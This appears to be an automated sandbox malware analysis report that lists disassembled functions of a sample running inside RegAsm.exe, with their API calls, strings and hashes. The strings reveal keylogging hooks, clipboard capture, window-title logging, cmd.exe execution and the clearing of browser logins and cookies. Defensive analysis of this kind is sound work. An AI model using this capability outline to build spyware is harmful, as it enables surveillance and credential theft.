• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Exception@8Throw
• String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
• API String ID: 2005118841-1866435925
• Opcode ID: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
• Instruction ID: 287a1f786264602a2f100ba68ee8cd07dacd1bfc9ef62352ff5e55a88b78f620
• Opcode Fuzzy Hash: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
• Instruction Fuzzy Hash: 59018F626583087AEB14B697CC03FBA33685B10708F10CC3BBD01765C2EA7D6A61C66F
APIs
• RegCreateKeyW.ADVAPI32(80000001,00000000,004752D8), ref: 0041385A
• RegSetValueExW.ADVAPI32 ref: 00413888
• RegCloseKey.ADVAPI32(004752D8), ref: 00413893
Strings
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: CloseCreateValue
• String ID: pth_unenc
• API String ID: 1818849710-4028850238
• Opcode ID: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
• Instruction ID: 9133f253890910ff78e8f434c24b82038cc7026402723a24ca4ec17c3e6d8cb5
• Opcode Fuzzy Hash: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
• Instruction Fuzzy Hash: 15F0C271440218FBCF00AFA1EC45FEE376CEF00756F10452AF905A61A1E7759E04DA94
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 0040DFEC
• std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040E02B
  • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 004356EC
  • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 00435710
• __CxxThrowException@8.LIBVCRUNTIME ref: 0040E051
Strings
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
• String ID: bad locale name
• API String ID: 3628047217-1405518554
• Opcode ID: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
• Instruction ID: 7f9ccd90240ef42149755af47b5df127ed13e8783c268b42739d505c0e35a915
• Opcode Fuzzy Hash: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
• Instruction Fuzzy Hash: 77F08131544A085AC338FA62D863DDA73B49F14358F50457FB406268D2EF78BA0CCA9D
APIs
• RegOpenKeyExW.ADVAPI32 ref: 00413678
• RegQueryValueExW.ADVAPI32(?,0040F34E,00000000,00000000,?,00000400), ref: 00413697
• RegCloseKey.ADVAPI32(?), ref: 004136A0
Strings
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: CloseOpenQueryValue
• String ID: 8)3
• API String ID: 3677997916-783258567
• Opcode ID: cdbe77b62fdb326fa84ed0ef2b451dd3af455626e780c5cb96fc0720a69048d7
• Instruction ID: b2ddc0a972744091932d43abea1e646d3cdf78111d27e2b843060007377f7c4f
• Opcode Fuzzy Hash: cdbe77b62fdb326fa84ed0ef2b451dd3af455626e780c5cb96fc0720a69048d7
• Instruction Fuzzy Hash: B7F04F75600218FBDF209B90DC05FDD7B7CEB04B15F1040A2BA45B5291DB749F949BA8
APIs
• CreateThread.KERNEL32(00000000,00000000,Function_0001D4EE,00000000,00000000,00000000), ref: 00416C82
• ShowWindow.USER32(00000009), ref: 00416C9C
• SetForegroundWindow.USER32 ref: 00416CA8
  • Part of subcall function 0041CE2C: AllocConsole.KERNEL32 ref: 0041CE35
  • Part of subcall function 0041CE2C: GetConsoleWindow.KERNEL32 ref: 0041CE3B
  • Part of subcall function 0041CE2C: ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
  • Part of subcall function 0041CE2C: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
Strings
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Window$Console$Show$AllocCreateForegroundOutputThread
• String ID: !D@
• API String ID: 186401046-604454484
• Opcode ID: bfcd2c8c1d2ae80447500fcbf9dc1f25f0f381f95e29ab0bb7edbe6635a3d2e1
• Instruction ID: 9f5213224becab59645eda34593d96b16d6ada18beeab21aaf628210512d7754
• Opcode Fuzzy Hash: bfcd2c8c1d2ae80447500fcbf9dc1f25f0f381f95e29ab0bb7edbe6635a3d2e1
• Instruction Fuzzy Hash: ECF05E70149340EAD720AB62ED45AFA7B69EB54341F01487BF909C20F2DB389C94865E
                                                                                                                                  APIs
                                                                                                                                  • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041616B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExecuteShell
                                                                                                                                  • String ID: /C $cmd.exe$open
                                                                                                                                  • API String ID: 587946157-3896048727
                                                                                                                                  • Opcode ID: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                                                                                                                                  • Instruction ID: 08f4dee505367bf09000beb2be63de5ecd082ae46aa0e0363999309db21c3e05
                                                                                                                                  • Opcode Fuzzy Hash: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                                                                                                                                  • Instruction Fuzzy Hash: 5EE0C0B0204305ABC605F675DC96CBF73ADAA94749B50483F7142A20E2EF7C9D49C65D
                                                                                                                                  APIs
                                                                                                                                  • TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
                                                                                                                                  • UnhookWindowsHookEx.USER32 ref: 0040B902
                                                                                                                                  • TerminateThread.KERNEL32(0040A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: TerminateThread$HookUnhookWindows
                                                                                                                                  • String ID: pth_unenc
                                                                                                                                  • API String ID: 3123878439-4028850238
                                                                                                                                  • Opcode ID: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                                                                                                                  • Instruction ID: 372ac16de24f92ae7b862ff59389ff52a9cc8b3ac2037ffe6dc6d1e564519698
                                                                                                                                  • Opcode Fuzzy Hash: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                                                                                                                  • Instruction Fuzzy Hash: 71E01272204315EFD7201F909C888667AADEE1539632409BEF6C261BB6CB7D4C54C79D
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                  • String ID: GetCursorInfo$User32.dll
                                                                                                                                  • API String ID: 1646373207-2714051624
                                                                                                                                  • Opcode ID: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                                                                                                                  • Instruction ID: 8b26e8b19aea132afe7ec2793fcae50f4a2deac5c44528798ee909e27cd98dc2
                                                                                                                                  • Opcode Fuzzy Hash: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                                                                                                                  • Instruction Fuzzy Hash: 6BB092B4981740FB8F102BB0AE4EA193A25B614703B1008B6F046961A2EBB888009A2E
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryA.KERNEL32(User32.dll), ref: 004014B9
                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                  • String ID: GetLastInputInfo$User32.dll
                                                                                                                                  • API String ID: 2574300362-1519888992
                                                                                                                                  • Opcode ID: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                                                                                                                                  • Instruction ID: d02e03e3b89f99dad65f23c179d95e13f318a7fd709defe56253aab8848571e2
                                                                                                                                  • Opcode Fuzzy Hash: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                                                                                                                                  • Instruction Fuzzy Hash: EFB092B8580300FBCB102FA0AD4E91E3A68AA18703B1008A7F441C21A1EBB888009F5F
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __alldvrm$_strrchr
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1036877536-0
                                                                                                                                  • Opcode ID: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                                                                                                                  • Instruction ID: 8ce1af842cd152cb2b2428f5d584a25f6c9224aafe101b92c03b71ca88d34985
                                                                                                                                  • Opcode Fuzzy Hash: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                                                                                                                  • Instruction Fuzzy Hash: 87A156729846829FF721CF58C8817AEBBA5FF15314F2841AFE8859B381D27C8C51C75A
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 269201875-0
                                                                                                                                  • Opcode ID: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                                                                                                                                  • Instruction ID: 6f8591e81a910498abf0b0e408487d1c0faf04506bf4bd3dd9e850377c22d226
                                                                                                                                  • Opcode Fuzzy Hash: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                                                                                                                                  • Instruction Fuzzy Hash: 34413931B00104AAEB207B7A9C4666F3AB5DF45735F570A1FFD28C7293DA7C481D426A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                                                                                                  • Instruction ID: b0a34e1ed6630e1fb57c9e62860a3601010315cd62f19612bff23542d182db60
                                                                                                                                  • Opcode Fuzzy Hash: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                                                                                                  • Instruction Fuzzy Hash: 70412AB1600704BFE724AF79CD41B5EBBE8EB88714F10462FF145DB281E3B999058798
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  • Cleared browsers logins and cookies., xrefs: 0040C130
                                                                                                                                  • [Cleared browsers logins and cookies.], xrefs: 0040C11F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Sleep
                                                                                                                                  • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                                                                                  • API String ID: 3472027048-1236744412
                                                                                                                                  • Opcode ID: af2c2d963010d4b9fe0ed32b7540b86f028afa125e63126aea6004068ef018c7
                                                                                                                                  • Instruction ID: 5a72b8a34604a64e244bad04561a930bad76f77e78bf22f3e088d6afb7384554
                                                                                                                                  • Opcode Fuzzy Hash: af2c2d963010d4b9fe0ed32b7540b86f028afa125e63126aea6004068ef018c7
                                                                                                                                  • Instruction Fuzzy Hash: A431A805648381EDD6116BF514967AB7B824A53748F0882BFB8C4373C3DA7A4808C79F
                                                                                                                                  APIs
                                                                                                                                  • EnumDisplayMonitors.USER32(00000000,00000000,0041960A,00000000), ref: 00419530
                                                                                                                                  • EnumDisplayDevicesW.USER32(?), ref: 00419560
                                                                                                                                  • EnumDisplayDevicesW.USER32(?,?,?,00000000), ref: 004195D5
                                                                                                                                  • EnumDisplayDevicesW.USER32(00000000,00000000,?,00000000), ref: 004195F2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DisplayEnum$Devices$Monitors
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1432082543-0
                                                                                                                                  • Opcode ID: 307544a1efd678830df2dab17394228d9bd71c3d3133ae3f2bbfdbf915fafe35
                                                                                                                                  • Instruction ID: 2d7c1ce958f8de7f9ce17d43b909e87ea7509c435c2805f0bc90a8abde121c81
                                                                                                                                  • Opcode Fuzzy Hash: 307544a1efd678830df2dab17394228d9bd71c3d3133ae3f2bbfdbf915fafe35
                                                                                                                                  • Instruction Fuzzy Hash: 232180721083146BD221DF26DC89EABBBECEBD1754F00053FF45AD3190EB749A49C66A
APIs
• GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D58
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 10001D72
• CloseHandle.KERNEL32(00000000), ref: 10001D7D
Memory Dump Source
• Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
Similarity
• API ID: File$CloseHandleReadSize
• String ID:
• API String ID: 3642004256-0
APIs
  • Part of subcall function 0041C5E2: GetForegroundWindow.USER32 ref: 0041C5F2
  • Part of subcall function 0041C5E2: GetWindowTextLengthW.USER32(00000000), ref: 0041C5FB
  • Part of subcall function 0041C5E2: GetWindowTextW.USER32(00000000,00000000,00000001,00000001,00000000), ref: 0041C625
• Sleep.KERNEL32(000001F4), ref: 0040A5AE
• Sleep.KERNEL32(00000064), ref: 0040A638
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Window$SleepText$ForegroundLength
• String ID: [ $ ]
• API String ID: 3309952895-93608704
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
• OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
• CloseHandle.KERNEL32(00000000), ref: 0041C2C4
• CloseHandle.KERNEL32(00000000), ref: 0041C2CC
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: CloseHandleOpenProcess
• String ID:
• API String ID: 39102293-0
APIs
• ___BuildCatchObject.LIBVCRUNTIME ref: 004398FA
  • Part of subcall function 00439F32: ___AdjustPointer.LIBCMT ref: 00439F7C
• _UnwindNestedFrames.LIBCMT ref: 00439911
• ___FrameUnwindToState.LIBVCRUNTIME ref: 00439923
• CallCatchBlock.LIBVCRUNTIME ref: 00439947
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
• String ID:
• API String ID: 2633735394-0
APIs
• GetSystemMetrics.USER32(0000004C,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 0041942B
• GetSystemMetrics.USER32(0000004D,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 00419431
• GetSystemMetrics.USER32(0000004E,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 00419437
• GetSystemMetrics.USER32(0000004F,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 0041943D
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: MetricsSystem
• String ID:
• API String ID: 4116985748-0
APIs
• ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438FB1
• ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438FB6
• ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438FBB
  • Part of subcall function 0043A4BA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A4CB
• ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438FD0
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
• String ID:
• API String ID: 1761009282-0
APIs
• __startOneArgErrorHandling.LIBCMT ref: 00442D3D
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: ErrorHandling__start
• String ID: pow
• API String ID: 3213639722-2276729525
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: __alloca_probe_16__freea
• String ID: 8)3
• API String ID: 1635606685-783258567
                                                                                                                                  • Opcode ID: ad763113ce13b2b8e626d2ff443e146e726dc092d285a8402790d1a017a5485e
                                                                                                                                  • Instruction ID: d8508cce09ee0c909582ed34c2e37a62d4695ec9c35a5d1c30796301694c113b
                                                                                                                                  • Opcode Fuzzy Hash: ad763113ce13b2b8e626d2ff443e146e726dc092d285a8402790d1a017a5485e
                                                                                                                                  • Instruction Fuzzy Hash: CC41F671A00611ABFF21AB65CC41A5EB7A4DF45714F15456FF809CB282EB3CD8508799
APIs
  • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
• __Init_thread_footer.LIBCMT ref: 0040B7D2
Strings
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Init_thread_footer__onexit
• String ID: [End of clipboard]$[Text copied to clipboard]
• API String ID: 1881088180-3686566968
• Opcode ID: bc6d6fd555eb74fb66702924759b933dd0787dde42f12c75391812bd244e7e16
• Instruction ID: 844f446031992ee5170c212df839aebd4a436c67f2956c9e8fe8aff684c3a130
• Opcode Fuzzy Hash: bc6d6fd555eb74fb66702924759b933dd0787dde42f12c75391812bd244e7e16
• Instruction Fuzzy Hash: 30217131A102198ACB14FBA6D8929EDB375AF54318F10443FE505771D2EF786D4ACA8C
APIs
• GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451E12,?,00000050,?,?,?,?,?), ref: 00451C92
Strings
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID:
• String ID: ACP$OCP
• API String ID: 0-711371036
• Opcode ID: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
• Instruction ID: 09b953eaa346ea86c897215e5a2a15a508f8bcb16f9b984b1dadcb699cf7d301
• Opcode Fuzzy Hash: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
• Instruction Fuzzy Hash: E821D862A80204A6DB36CF14C941BAB7266DB54B13F568426ED0AD7322F73BED45C35C
APIs
• WriteFile.KERNEL32(?,?,?,?,00000000), ref: 100098B1
• GetLastError.KERNEL32(?,10009C44,?,00000000,?,00000000,00000000,?,00000000), ref: 100098DA
Strings
Memory Dump Source
